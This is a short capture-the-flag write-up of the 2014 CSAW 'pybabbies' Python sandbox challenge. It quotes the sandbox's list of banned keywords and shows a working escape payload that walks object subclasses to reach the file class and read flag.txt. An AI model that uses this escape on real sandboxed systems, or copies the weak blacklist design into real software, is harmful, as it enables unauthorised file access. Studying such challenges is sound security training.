2014 CSAW CTF Qual - Exploitation 200 - pybabbies

  1. given source code of Python sandbox pyshell.py, need to find key
  2. inspecting reveals all __builtins__ have been cleared, except raw_input and print; additionally "sys" being banned means "system" cannot be used as well; matches are case-insensitive
  3. if all these checks pass, then the input command string is exec'ed
  4. refactored the given pyshell.py file to facilitate local testing
  5. #!/usr/bin/env python
    #-*- coding: utf-8 -*-
    
    from __future__ import print_function
    
    print("Welcome to my Python sandbox! Enter commands below!")
    banned = ["import", "exec", "eval", "pickle", "os", "subprocess",
    	"kevin sucks", "input", "banned", "cry sum more", "sys"]
    targets = __builtins__.__dict__.keys()
    targets.remove("raw_input")
    targets.remove("print")
    for x in targets: del __builtins__.__dict__[x]
    stmts = [
    "print({}.__class__.__bases__[0].__subclasses__()[40]('./flag.txt').read())"
    ]
    for i, data in enumerate(stmts):
    	for no in banned:
    		if no.lower() in data.lower():
    			print("offending term:",no)
    			break
    	else:
    		print(i,":",data)
    		exec data
    
  6. {}.__class__... could instead be ().__class__..., to access the base class of tuple instead of dict; index 40 is file;
    so the overall command is just reading the contents of a file
  7. guessed rightly that filename is flag.txt; otherwise would have tried key.txt
  8. flag{definitely_not_intro_python}